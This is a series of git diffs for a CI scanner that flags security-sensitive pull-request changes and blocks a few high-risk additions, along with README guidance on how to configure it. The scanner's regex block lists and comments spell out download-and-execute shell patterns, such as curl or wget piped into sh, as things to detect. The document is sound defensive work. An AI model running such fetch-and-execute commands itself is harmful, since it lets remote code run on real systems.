+  have approved the exact current HEAD**. Pushing a new commit changes the
+  HEAD, so the previous approval no longer applies.
+- **A few additions are rejected outright.** Runtime process/shell execution,
+  FFI and dynamic library loading, the privileged pull-request trigger variant
+  (`pull_request` + `_target`), Actions `write-all` permissions, and
+  download-and-execute shell patterns are not bypassable by approval. If
+  Linthra genuinely needs one of these, it should land as its own
+  maintainer-controlled change, not inside an unrelated contributor PR.
+- **The scanner comes from the trusted base.** The workflow reads
+  `scripts/check_pr_security_surface.py` out of the PR's base commit, so a PR
+  cannot weaken the classifier in the same change it is trying to pass.
+- **It fails closed.** A missing base commit, an undecodable diff header, a
+  scanner crash, or a scan that ends without a verdict all fail the job.
+
+The workflow holds only `contents: read` and `pull-requests: read`, receives no
+repository secrets, and never executes contributor code.
+
+## Required repository configuration
+
+> **The workflow cannot enforce this part itself.** Configure it once, in
+> repository settings.
+
+For `pull_request` events GitHub evaluates the workflow definition from the
+PR's merge ref. A contributor can therefore edit
+`.github/workflows/pr-security-review.yml` in their own PR — keeping the
+workflow name and the `Security surface guard` job name while replacing the
+steps with something that trivially succeeds. A required status check matched
+**by name** would accept that green result even though the trusted scanner
+never ran.
+
+To close it, the guard has to run from a definition the PR cannot edit:
+
+1. Open **Settings → Rules → Rulesets** and add a ruleset targeting the default
+   branch.
+2. Enable **Require workflows to pass before merging**.
+3. Add `.github/workflows/pr-security-review.yml` from **this repository**,
+   pinned to a trusted ref (`main`, or a tag/SHA you bump deliberately).
+4. Keep **Require status checks to pass** enabled as well, so the check is
+   both required and sourced from the trusted definition.
+
+With the ruleset in place, editing the workflow inside a PR no longer changes
+what runs for that PR. Without it, the classifier is still loaded from the
+trusted base — but the surrounding gate is only as trustworthy as the PR's own
+copy of the workflow.
+
+Changes to the guard's own files are classified sensitive, so an external PR
+touching them needs a maintainer security review regardless.
+
+## Bootstrap
+
+The first PR to introduce the scanner cannot load it from a base that does not
+contain it yet. In that single case the workflow falls back to the PR head's
+copy, and only when the PR author is the repository owner **and** the head
+branch lives in this repository. An external PR whose base lacks the scanner
+fails closed instead. Once the scanner is on `main`, this path is unreachable.
+
+## Working on the guard
+
+Run the tests directly:
+
+```sh
+python3 test/tooling/check_pr_security_surface_test.py
+```
+
+They build synthetic git repositories for every classification and blocked
+pattern, cover the diff-rendering tricks that would otherwise hide an added
+line (quoted pathnames, `.gitattributes` `-diff`, renames, constructs split
+across lines and hunks), and execute the workflow's own trusted-scanner loader
+and review-decision filter straight out of the YAML.
+
+One constraint is easy to trip over: the guard scans every added line of every
+changed file, **including its own sources**. A blocked pattern written out in
+full in the scanner, the workflow, or the tests would make the guard reject any
+PR that touches the guard. `_split_literal()` in the scanner and `blocked()` in
+the tests assemble those literals from fragments, and
+`GuardSelfSafety` fails the build if a contiguous one ever creeps back in.

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -73,6 +73,18 @@ def _split_literal(*fragments: str) -> str:
     return "".join(fragments)
 
 
+# Separator allowed between the tokens of a blocked construct. Dart accepts a
+# comment anywhere whitespace is legal, so a block or line comment wedged
+# between an API's receiver, its dot and its member name is the same call.
+#
+# This is deliberately a *separator*, not a comment-stripping pass over the
+# diff. Stripping would have to decide what is a comment and what is a string
+# literal, and getting that wrong is itself a bypass: a crafted `/*` inside a
+# string would make the stripper swallow the real code that follows it. Widening
+# the gap between two tokens cannot hide anything, because the separator only
+# ever matches whitespace and comments — never code.
+_SEP = r"(?:\s|(?s:/\*.*?\*/)|//[^\n]*)*"
+
 _FFI = _split_literal("f", "fi")
 _PR_TARGET_TRIGGER = _split_literal("pull_request", "_target")
 
@@ -81,7 +93,10 @@ _PR_TARGET_TRIGGER = _split_literal("pull_request", "_target")
 # same runtime capability as calling it inline, so requiring a following `(`
 # would leave a trivial bypass.
 BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
-    (re.compile(r"\bProcess\s*\.\s*(?:run|runSync|start|startSync|killPid)\b"), "runtime process execution"),
+    (
+        re.compile(rf"\bProcess{_SEP}\.{_SEP}(?:run|runSync|start|startSync|killPid)\b"),
+        "runtime process execution",
+    ),
     (re.compile(rf"""\b{_split_literal("runIn", "Shell")}\b"""), "runtime shell execution"),
     (
         re.compile(
@@ -102,12 +117,27 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     ),
     (
         re.compile(
-            r"(?:curl|wget)[^\n|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
+            r"(?:curl|wget)[^\n|]*\|\s*(?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
             r"|\b(?:sh|bash|zsh)\s+<\(\s*(?:curl|wget)\b"
             r"|\b(?:sh|bash|zsh)\s+-c\s+['\"]?\$\(\s*(?:curl|wget)\b"
             r"|\beval\s+.*\$\(\s*(?:curl|wget)\b"
         ),
         "download-and-execute shell pattern",
+    ),
+    (
+        # Download-to-file, then run that same file. The backreference is what
+        # keeps this precise: fetching a data file and separately running an
+        # unrelated local script does not match.
+        re.compile(
+            r"(?:curl|wget)[^\n]*?"
+            r"(?:\s-o\s+|\s--output[= ]|\s-O\s+|\s*>\s*)"
+            r"(?P<target>['\"]?[^\s'\";&|<>]+['\"]?)"
+            r"[\s\S]{0,2000}?"
+            r"(?:[\s;&|(](?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\s+"
+            r"|[\s;&|(]chmod\s+\+x\s+)"
+            r"(?P=target)"
+        ),
+        "download-then-execute shell pattern",
     ),
 )
 

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -93,7 +93,13 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         "runtime FFI / dynamic library loading",
     ),
     (re.compile(rf"\b{_PR_TARGET_TRIGGER}\b"), f"{_PR_TARGET_TRIGGER} workflow trigger"),
-    (re.compile(r"""\bpermissions\s*:\s*['"]?write-all\b|^\s*['"]?write-all['"]?\s*$"""), "GitHub Actions write-all permissions"),
+    (
+        re.compile(
+            r"""\bpermissions\s*:\s*['"]?write-all\b|^[ \t]*['"]?write-all['"]?[ \t]*$""",
+            re.MULTILINE,
+        ),
+        "GitHub Actions write-all permissions",
+    ),
     (
         re.compile(
             r"(?:curl|wget)[^\n|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
@@ -267,6 +273,41 @@ def added_lines(base: str, head: str) -> list[tuple[str, str]]:
     return additions
 
 
+_SHELL_LINE_CONTINUATION = re.compile(r"\\\n[ \t]*")
+_SHELL_PIPE_CONTINUATION = re.compile(r"\|[ \t]*\n[ \t]*")
+
+
+def fold_continuations(text: str) -> str:
+    """Rejoin shell line continuations inside a block of added lines.
+
+    A trailing backslash, or a trailing pipe, carries one shell command onto the
+    next line. The download-and-execute rule deliberately refuses to match
+    across a newline — otherwise an unrelated interpreter invocation far below a
+    download would trip it — so a genuine continuation has to be folded away
+    before that rule runs.
+    """
+
+    text = _SHELL_LINE_CONTINUATION.sub(" ", text)
+    return _SHELL_PIPE_CONTINUATION.sub("| ", text)
+
+
+def group_additions(additions: list[tuple[str, str]]) -> list[tuple[str, str]]:
+    """Collapse a file's added lines into one block of text to scan.
+
+    Rules are applied to the block rather than to each line on its own, because
+    the constructs they describe do not have to sit on one physical line. Dart
+    accepts a newline anywhere between tokens, so `Process` and `.run(...)` can
+    be split across two added lines — and, with `--unified=0`, across two hunks
+    with an untouched blank line or comment between them. Joining every added
+    line of a file leaves nowhere for a blocked construct to hide.
+    """
+
+    blocks: dict[str, list[str]] = {}
+    for path, line in additions:
+        blocks.setdefault(path, []).append(line)
+    return [(path, fold_continuations("\n".join(lines))) for path, lines in blocks.items()]
+
+
 def dedupe(findings: list[Finding]) -> list[Finding]:
     seen: set[tuple[str, str]] = set()
     result: list[Finding] = []
@@ -287,16 +328,16 @@ def classify(files: list[str], additions: list[tuple[str, str]]) -> tuple[list[F
             if pattern.search(path):
                 sensitive.append(Finding(path, reason))
 
-    for path, line in additions:
+    for path, block in group_additions(additions):
         if path == UNKNOWN_PATH:
             sensitive.append(
                 Finding(UNKNOWN_PATH, "diff header could not be decoded; review manually")
             )
         for pattern, reason in SENSITIVE_ADDITION_RULES:
-            if pattern.search(line):
+            if pattern.search(block):
                 sensitive.append(Finding(path, reason))
         for pattern, reason in BLOCKED_ADDITION_RULES:
-            if pattern.search(line):
+            if pattern.search(block):
                 blocked.append(Finding(path, reason))
 
     return dedupe(sensitive), dedupe(blocked)

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -151,9 +151,9 @@ _EXEC_WRAPPER = (
 #   `;`, `|` and `&&` end the download command, so the output flag has to be
 #   found before one; a single `&` is kept, being ordinary inside a quoted
 #   query string. Short options bundle and may carry the value attached
-#   (`-o f`, `-qO f`, `-of`); the long forms cover curl's --output and wget's
-#   --output-document. Quotes live outside the capture so `-o /tmp/i` and
-#   `sh "/tmp/i"` compare equal.
+#   (`-o f`, `-qO f`, `-of`); the long forms cover both clients' output options.
+#   Quotes live outside the capture so quoted and unquoted target paths compare
+#   equal when the same downloaded file is later executed.
 def _download_to_file(gap: str) -> str:
     return (
         rf"(?:curl|wget)(?:[^\n;|&]|&(?!&)|\\\n)*?"
@@ -172,9 +172,9 @@ _SAME_TARGET = r"""['\"]?(?P=target)(?=$|[\s'\";&|)<>])"""
 _SH_GAP = r"(?:[ \t]|\\\n)"
 
 # One shell argument/fragment that may contain separators only while quoted.
-# This keeps `curl 'https://x?a=1&b=2' | sh` detectable while ensuring an
-# unquoted `;` or `&` ends the curl/wget command instead of letting a later,
-# unrelated pipeline become a false hard block.
+# A quoted URL may legitimately contain `&` or `;`; it must still be recognized
+# when its download stream is piped into an interpreter. Unquoted separators end
+# that command so a later unrelated local pipeline cannot become a hard block.
 _SHELL_QUOTED = r"""(?:'(?:[^']*)'|"(?:\\.|[^"\\])*")"""
 _SHELL_COMMAND_SEGMENT = rf"(?:{_SHELL_QUOTED}|\\\n|[^\n|;&])*"
 
@@ -233,8 +233,9 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         re.compile(
             # Quoted arguments may legitimately contain `;`, `&`, or `|`; an
             # unquoted separator ends the download command. Intermediate pipe
-            # stages use the same quote-aware segment so `| sed 's;a;b;' | sh`
-            # stays detectable without crossing into a later unrelated command.
+            # stages use the same quote-aware segment so quoted transformation
+            # expressions remain part of that pipeline without crossing into a
+            # later unrelated command.
             rf"(?:curl|wget){_SHELL_COMMAND_SEGMENT}"
             rf"(?:(?<!\|)\|(?!\|){_SHELL_COMMAND_SEGMENT})*"
             rf"(?<!\|)\|(?!\|)[ \t]*\n?[ \t]*"

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -161,8 +161,14 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     (
         re.compile(
             # `(?:[^\n|]|\\\n)` lets a backslash continuation cross a line;
-            # `\n?` after the pipe covers a pipe left at end of line.
-            r"(?:curl|wget)(?:[^\n|]|\\\n)*\|[ \t]*\n?[ \t]*(?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
+            # `\n?` after the pipe covers a pipe left at end of line. The
+            # `(?:\|[^|\n;&]*)*` run allows intermediate stages — `| tee f | sh`
+            # pipes the same downloaded stream into the interpreter — while
+            # refusing to cross `;` or `&`, which would end the pipeline and
+            # make a later `| sh` a different command.
+            r"(?:curl|wget)(?:[^\n|]|\\\n)*(?:(?<!\|)\|(?!\|)[^|\n;&]*)*"
+            r"(?<!\|)\|(?!\|)[ \t]*\n?[ \t]*"
+            r"(?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
             r"|\b(?:sh|bash|zsh)\s+<\(\s*(?:curl|wget)\b"
             r"|\b(?:sh|bash|zsh)\s+-c\s+['\"]?\$\(\s*(?:curl|wget)\b"
             r"|\beval\s+.*\$\(\s*(?:curl|wget)\b"
@@ -174,7 +180,10 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         # keeps this precise: fetching a data file and separately running an
         # unrelated local script does not match.
         re.compile(
-            rf"(?:curl|wget)(?:[^\n]|\\\n)*?"
+            # `;`, `|` and `&&` end the download command, so the output flag
+            # has to be found before one. A single `&` is kept, because it is
+            # ordinary inside a quoted query string.
+            rf"(?:curl|wget)(?:[^\n;|&]|&(?!&)|\\\n)*?"
             # Short options bundle and may carry the value attached:
             # `-o f`, `-qO f`, `-sLo f`, `-of`. Long forms cover curl's
             # --output and wget's --output-document.
@@ -187,6 +196,9 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
             rf"[\s\S]{{0,2000}}?"
             rf"(?:[\s;&|(](?:sudo{_SH_GAP}+)?(?:/\S+/)?"
             rf"(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node){_SH_GAP}+"
+            # `. f` and `source f` execute the file in the current shell, which
+            # is the same capability by a different spelling.
+            rf"|(?:^|[\n;&|(]){_SH_GAP}*(?:\.|source){_SH_GAP}+"
             rf"|[\s;&|(]chmod{_SH_GAP}+\+x{_SH_GAP}+)"
             # An argument boundary, not \b: `/tmp/data` must not match inside
             # `/tmp/data-cleanup.sh`, which is a different file.
@@ -335,18 +347,34 @@ class ChangedSource:
     path: str
     text: str
     added_lines: frozenset[int]
-    has_deletions: bool
+    suppression_removed: bool
 
+
+# Lines whose removal can make neighbouring code live without that code being
+# retyped: block and markup comment delimiters, a disabled preprocessor branch,
+# a `false` guard. This is the signal the sensitive tier watches, in place of a
+# net line count.
+#
+# Net loss was too weak — replacing `/*` with a blank line loses nothing — and
+# "any removed line" is far too strong, since a one-for-one edit removes its old
+# line and 216 files carry a sensitive match. Looking at what was removed is
+# both narrower and more complete than either.
+_SUPPRESSION_REMOVED = re.compile(
+    r"^\s*(?:/\*+|\*+/|<!--|-->|#\s*if\s+0\b|#\s*endif\b"
+    r"|(?:\}\s*)?if\s*\(\s*false\s*\)\s*\{?)\s*$"
+)
 
 _HUNK = re.compile(r"^@@ -\d+(?:,(\d+))? \+(\d+)(?:,(\d+))? @@")
 
 
 def added_line_numbers(base: str, head: str) -> dict[str, tuple[set[int], bool]]:
-    """Map each path still at head to the lines it gained and whether it lost any.
+    """Map each path still at head to the lines it gained, and whether the PR
+    removed a line that had been suppressing code.
 
-    Only hunk headers are read. The added text itself is taken from the file's
-    post-change blob instead, which is why `--text` matters here: without it a
-    `.gitattributes` `-diff` entry would suppress the hunk headers too.
+    Added text is taken from the file's post-change blob rather than from the
+    diff, which is why `--text` matters here: without it a `.gitattributes`
+    `-diff` entry would suppress the hunk headers too. Removed lines have no
+    post-change counterpart, so they are read here for their content alone.
     """
 
     diff = run_git(
@@ -361,21 +389,36 @@ def added_line_numbers(base: str, head: str) -> dict[str, tuple[set[int], bool]]
     added: dict[str, tuple[set[int], bool]] = {}
     current_path: str | None = None
     seen_header = False
+    in_hunk = False
 
     for line in diff.split("\n"):
         if line.startswith("diff --git "):
             current_path = None
             seen_header = False
+            in_hunk = False
             continue
         if line.startswith("+++ ") and not seen_header:
             current_path = _header_path(line[4:])
             seen_header = True
             continue
+
         match = _HUNK.match(line)
-        if not match:
+        if match is None:
+            # Removed lines are read for their content only; they do not exist
+            # in the post-change file and so have no line number to record.
+            if (
+                in_hunk
+                and line.startswith("-")
+                and current_path not in (None, DELETED)
+                and _SUPPRESSION_REMOVED.match(line[1:])
+            ):
+                path = current_path or UNKNOWN_PATH
+                lines, _ = added.setdefault(path, (set(), False))
+                added[path] = (lines, True)
             continue
+
         seen_header = True
-        removed = 1 if match.group(1) is None else int(match.group(1))
+        in_hunk = True
         start = int(match.group(2))
         count = 1 if match.group(3) is None else int(match.group(3))
 
@@ -385,12 +428,10 @@ def added_line_numbers(base: str, head: str) -> dict[str, tuple[set[int], bool]]
             continue
 
         path = current_path or UNKNOWN_PATH
-        lines, deletions = added.setdefault(path, (set(), False))
-        if removed > count:
-            deletions = True
+        lines, suppression_removed = added.setdefault(path, (set(), False))
         if count:
             lines.update(range(start, start + count))
-        added[path] = (lines, deletions)
+        added[path] = (lines, suppression_removed)
 
     return added
 
@@ -418,7 +459,7 @@ def changed_sources(base: str, head: str) -> tuple[list[ChangedSource], bool]:
     sources: list[ChangedSource] = []
     unresolved = False
 
-    for path, (lines, deletions) in added_line_numbers(base, head).items():
+    for path, (lines, suppression_removed) in added_line_numbers(base, head).items():
         if path == UNKNOWN_PATH:
             unresolved = True
             continue
@@ -430,7 +471,7 @@ def changed_sources(base: str, head: str) -> tuple[list[ChangedSource], bool]:
             raise ScannerError(
                 f"{path!r} changed but has no readable content at {head}"
             )
-        sources.append(ChangedSource(path, text, frozenset(lines), deletions))
+        sources.append(ChangedSource(path, text, frozenset(lines), suppression_removed))
 
     return sources, unresolved
 
@@ -527,19 +568,19 @@ def classify(
                                 f"change to a file containing existing {reason}",
                             )
                         )
-                    elif source.has_deletions:
+                    elif source.suppression_removed:
                         # The sensitive patterns are far broader — 356 files
                         # carry one. Asking on every edit to any of them would
                         # make the ordinary UI/tests/docs PR a reviewed PR,
-                        # which is the one thing this guard must not do. Removed
-                        # lines are the narrower signal: uncommenting existing
-                        # code deletes the delimiters. An edit that activates
-                        # without removing anything is not caught here, and is
-                        # accepted — this tier gates review, not merge.
+                        # which is the one thing this guard must not do. So the
+                        # signal here is narrow and specific: the PR removed a
+                        # line that had been suppressing code. An edit that
+                        # activates without removing such a line is not caught,
+                        # and is accepted — this tier gates review, not merge.
                         sensitive.append(
                             Finding(
                                 source.path,
-                                f"deletion may activate existing {reason}",
+                                f"removed suppression may activate existing {reason}",
                             )
                         )
 

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -46,6 +46,10 @@ SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     # build. The repository's own toolchain guard covers only the automated
     # `toolchain/flutter-sdk` branch, by design, so an ordinary PR editing a
     # pin is unreviewed without this.
+    # res/xml holds the app's security and privacy policy: the network security
+    # config decides HTTPS trust anchors and cleartext, and the backup and
+    # data-extraction rules decide what app data leaves the device.
+    (re.compile(r"^android/.*/res/xml/"), "Android security / privacy policy"),
     (re.compile(r"(?:^|/)gradle/wrapper/"), "build toolchain distribution / wrapper"),
     (re.compile(r"^\.[a-z0-9]+-version$"), "build toolchain pin"),
     # linux/ is the desktop runner; native/ holds the C++ DSP library and the
@@ -169,7 +173,9 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
             r"[\s\S]{0,2000}?"
             r"(?:[\s;&|(](?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\s+"
             r"|[\s;&|(]chmod\s+\+x\s+)"
-            r"['\"]?(?P=target)\b"
+            # An argument boundary, not \b: `/tmp/data` must not match inside
+            # `/tmp/data-cleanup.sh`, which is a different file.
+            r"['\"]?(?P=target)(?=$|[\s'\";&|)<>])"
         ),
         "download-then-execute shell pattern",
     ),
@@ -314,13 +320,14 @@ class ChangedSource:
     path: str
     text: str
     added_lines: frozenset[int]
+    has_deletions: bool
 
 
 _HUNK = re.compile(r"^@@ -\d+(?:,(\d+))? \+(\d+)(?:,(\d+))? @@")
 
 
-def added_line_numbers(base: str, head: str) -> dict[str, set[int]]:
-    """Map each path still present at head to the 1-based lines it gained.
+def added_line_numbers(base: str, head: str) -> dict[str, tuple[set[int], bool]]:
+    """Map each path still at head to the lines it gained and whether it lost any.
 
     Only hunk headers are read. The added text itself is taken from the file's
     post-change blob instead, which is why `--text` matters here: without it a
@@ -336,7 +343,7 @@ def added_line_numbers(base: str, head: str) -> dict[str, set[int]]:
         "--",
     )
 
-    added: dict[str, set[int]] = {}
+    added: dict[str, tuple[set[int], bool]] = {}
     current_path: str | None = None
     seen_header = False
 
@@ -363,9 +370,12 @@ def added_line_numbers(base: str, head: str) -> dict[str, set[int]]:
             continue
 
         path = current_path or UNKNOWN_PATH
-        lines = added.setdefault(path, set())
+        lines, deletions = added.setdefault(path, (set(), False))
+        if removed > count:
+            deletions = True
         if count:
             lines.update(range(start, start + count))
+        added[path] = (lines, deletions)
 
     return added
 
@@ -393,7 +403,7 @@ def changed_sources(base: str, head: str) -> tuple[list[ChangedSource], bool]:
     sources: list[ChangedSource] = []
     unresolved = False
 
-    for path, lines in added_line_numbers(base, head).items():
+    for path, (lines, deletions) in added_line_numbers(base, head).items():
         if path == UNKNOWN_PATH:
             unresolved = True
             continue
@@ -405,7 +415,7 @@ def changed_sources(base: str, head: str) -> tuple[list[ChangedSource], bool]:
             raise ScannerError(
                 f"{path!r} changed but has no readable content at {head}"
             )
-        sources.append(ChangedSource(path, text, frozenset(lines)))
+        sources.append(ChangedSource(path, text, frozenset(lines), deletions))
 
     return sources, unresolved
 
@@ -491,11 +501,30 @@ def classify(
                     # ways (a regex cannot decide reachability), any change to a
                     # file that still holds a blocked construct asks for a
                     # maintainer. Eight files in this repository qualify.
-                    if elsewhere and sink is blocked:
+                    if not elsewhere:
+                        continue
+                    if sink is blocked:
+                        # Only eight files in the repository hold one of these,
+                        # so any change to one can afford to ask.
                         sensitive.append(
                             Finding(
                                 source.path,
                                 f"change to a file containing existing {reason}",
+                            )
+                        )
+                    elif source.has_deletions:
+                        # The sensitive patterns are far broader — 356 files
+                        # carry one. Asking on every edit to any of them would
+                        # make the ordinary UI/tests/docs PR a reviewed PR,
+                        # which is the one thing this guard must not do. Removed
+                        # lines are the narrower signal: uncommenting existing
+                        # code deletes the delimiters. An edit that activates
+                        # without removing anything is not caught here, and is
+                        # accepted — this tier gates review, not merge.
+                        sensitive.append(
+                            Finding(
+                                source.path,
+                                f"deletion may activate existing {reason}",
                             )
                         )
 

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -133,7 +133,10 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         # unrelated local script does not match.
         re.compile(
             r"(?:curl|wget)[^\n]*?"
-            r"(?:\s-o\s+|\s--output[= ]|\s-O\s+|\s*>\s*)"
+            # Short options bundle and may carry the value attached:
+            # `-o f`, `-o f`, `-qO f`, `-sLo f`, `-of`. Long forms cover curl's
+            # --output and wget's --output-document.
+            r"(?:\s-[A-Za-z]*[oO]\s*|\s--output(?:-document)?[=\s]\s*|\s*>\s*)"
             # Quotes live outside the capture so `-o /tmp/i` and `sh "/tmp/i"`
             # compare equal.
             r"['\"]?(?P<target>[^\s'\";&|<>]+)['\"]?"

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -160,10 +160,13 @@ def run_git(*args: str) -> str:
             ["git", *args],
             check=True,
             # `--text` renders binary blobs inline, so git's output is not
-            # guaranteed to be valid UTF-8. Replace undecodable bytes instead of
-            # raising: an added image must not crash the scan.
+            # guaranteed to be valid UTF-8, and a pathname may hold any byte at
+            # all. surrogateescape keeps those bytes intact and reversible:
+            # decoding must not crash on an added image, and must not corrupt a
+            # pathname that then has to be handed back to `git show`. "replace"
+            # would do exactly that, turning the path into one git cannot find.
             encoding="utf-8",
-            errors="replace",
+            errors="surrogateescape",
             stdout=subprocess.PIPE,
             stderr=subprocess.PIPE,
         )
@@ -244,7 +247,7 @@ def unquote_git_path(value: str) -> str:
         else:
             decoded.extend(escape.encode("utf-8"))
             index += 1
-    return decoded.decode("utf-8", "replace")
+    return decoded.decode("utf-8", "surrogateescape")
 
 
 def changed_files(base: str, head: str) -> list[str]:
@@ -279,13 +282,14 @@ class ChangedSource:
     path: str
     text: str
     added_lines: frozenset[int]
+    has_deletions: bool
 
 
-_HUNK = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,(\d+))? @@")
+_HUNK = re.compile(r"^@@ -\d+(?:,(\d+))? \+(\d+)(?:,(\d+))? @@")
 
 
-def added_line_numbers(base: str, head: str) -> dict[str, set[int]]:
-    """Map each changed path to the 1-based line numbers it gained.
+def added_line_numbers(base: str, head: str) -> dict[str, tuple[set[int], bool]]:
+    """Map each changed path to the lines it gained and whether it lost any.
 
     Only hunk headers are read. The added text itself is taken from the file's
     post-change blob instead, which is why `--text` matters here: without it a
@@ -301,7 +305,7 @@ def added_line_numbers(base: str, head: str) -> dict[str, set[int]]:
         "--",
     )
 
-    added: dict[str, set[int]] = {}
+    added: dict[str, tuple[set[int], bool]] = {}
     current_path: str | None = None
     seen_header = False
 
@@ -318,12 +322,21 @@ def added_line_numbers(base: str, head: str) -> dict[str, set[int]]:
         if not match:
             continue
         seen_header = True
-        start = int(match.group(1))
-        count = 1 if match.group(2) is None else int(match.group(2))
-        if count == 0:
-            continue
+        removed = 1 if match.group(1) is None else int(match.group(1))
+        start = int(match.group(2))
+        count = 1 if match.group(3) is None else int(match.group(3))
+
         path = current_path or UNKNOWN_PATH
-        added.setdefault(path, set()).update(range(start, start + count))
+        lines, deletions = added.setdefault(path, (set(), False))
+        # A net loss of lines is what can activate code the PR never retyped:
+        # dropping a `/*` or an `if (false)` wrapper leaves the guarded call
+        # untouched but live. A one-for-one edit is not that — its new text is
+        # an added line and gets scanned as one.
+        if removed > count:
+            deletions = True
+        if count:
+            lines.update(range(start, start + count))
+        added[path] = (lines, deletions)
 
     return added
 
@@ -351,16 +364,21 @@ def changed_sources(base: str, head: str) -> tuple[list[ChangedSource], bool]:
     sources: list[ChangedSource] = []
     unresolved = False
 
-    for path, lines in added_line_numbers(base, head).items():
+    for path, (lines, deletions) in added_line_numbers(base, head).items():
         if path == UNKNOWN_PATH:
             unresolved = True
             continue
+        if not lines and not deletions:
+            continue
         text = file_text(head, path)
         if text is None:
-            # Added lines but no blob at head: the path was renamed away or
-            # removed by a later commit in the range. Nothing left to scan.
-            continue
-        sources.append(ChangedSource(path, text, frozenset(lines)))
+            # This path changed, so its post-change blob must exist. If it
+            # cannot be read then the diff and the tree disagree, and skipping
+            # the file would silently drop it from the scan.
+            raise ScannerError(
+                f"{path!r} changed but has no readable content at {head}"
+            )
+        sources.append(ChangedSource(path, text, frozenset(lines), deletions))
 
     return sources, unresolved
 
@@ -428,19 +446,38 @@ def classify(
             (BLOCKED_ADDITION_RULES, blocked),
         ):
             for pattern, reason in rules:
+                elsewhere = False
                 for match in pattern.finditer(source.text):
                     if touches_added_lines(
                         offsets, source.added_lines, match.start(), match.end()
                     ):
                         sink.append(Finding(source.path, reason))
                         break
+                    elsewhere = True
+                else:
+                    # The construct is in the file but on lines this PR left
+                    # alone. Normally that is grandfathered code and no concern.
+                    # It stops being grandfathered when the PR removes lines:
+                    # deleting a comment opener or a disabled branch can make an
+                    # untouched call live without ever retyping it. Deciding
+                    # that from a regex would need a real Dart parser, so this
+                    # asks for a maintainer rather than guessing.
+                    if elsewhere and source.has_deletions and sink is blocked:
+                        sensitive.append(
+                            Finding(
+                                source.path,
+                                f"deletion may activate existing {reason}",
+                            )
+                        )
 
     return dedupe(sensitive), dedupe(blocked)
 
 
 def write_report(report_path: Path, files: list[str], sensitive: list[Finding], blocked: list[Finding]) -> None:
     report_path.parent.mkdir(parents=True, exist_ok=True)
-    with report_path.open("w", encoding="utf-8") as report:
+    # backslashreplace: a pathname byte that is not valid UTF-8 survives as a
+    # surrogate in `path`, and must render readably here rather than raising.
+    with report_path.open("w", encoding="utf-8", errors="backslashreplace") as report:
         report.write("## PR security surface scan\n\n")
         report.write(f"Changed files: **{len(files)}**\n\n")
         if blocked:
@@ -464,6 +501,11 @@ def main(argv: list[str] | None = None) -> int:
     parser.add_argument("--github-output")
     args = parser.parse_args(argv)
 
+    # Findings may carry a pathname that is not valid UTF-8; print it rather
+    # than dying on it.
+    for stream in (sys.stdout, sys.stderr):
+        stream.reconfigure(errors="backslashreplace")
+
     try:
         files = changed_files(args.base, args.head)
         sources, unresolved_paths = changed_sources(args.base, args.head)
@@ -476,7 +518,7 @@ def main(argv: list[str] | None = None) -> int:
     write_report(Path(args.report), files, sensitive, blocked)
 
     if args.github_output:
-        with open(args.github_output, "a", encoding="utf-8") as output:
+        with open(args.github_output, "a", encoding="utf-8", errors="backslashreplace") as output:
             output.write(f"sensitive={'true' if sensitive else 'false'}\n")
             output.write(f"blocked={'true' if blocked else 'false'}\n")
 

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -1,0 +1,161 @@
+#!/usr/bin/env python3
+"""Classify security-sensitive PR diffs and block a few high-risk additions.
+
+This is intentionally conservative: ordinary UI/tests/docs PRs should pass
+without maintainer involvement, while changes that touch trust boundaries are
+surfaced for an explicit second review.
+"""
+
+from __future__ import annotations
+
+import argparse
+import os
+import re
+import subprocess
+from dataclasses import dataclass
+from pathlib import Path
+
+
+@dataclass(frozen=True)
+class Finding:
+    path: str
+    reason: str
+
+
+SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
+    (re.compile(r"^\.github/(workflows|actions)/"), "CI / GitHub Actions"),
+    (re.compile(r"^scripts/"), "repository automation script"),
+    (re.compile(r"^(pubspec\.ya?ml|pubspec\.lock)$"), "dependency manifest / lockfile"),
+    (re.compile(r"^android/.*(AndroidManifest\.xml|\.gradle(?:\.kts)?|gradle\.properties)$"), "Android permissions / build configuration"),
+    (re.compile(r"^linux/.*(CMakeLists\.txt|\.cc|\.cpp|\.c|\.h|\.hpp)$"), "native Linux code / build configuration"),
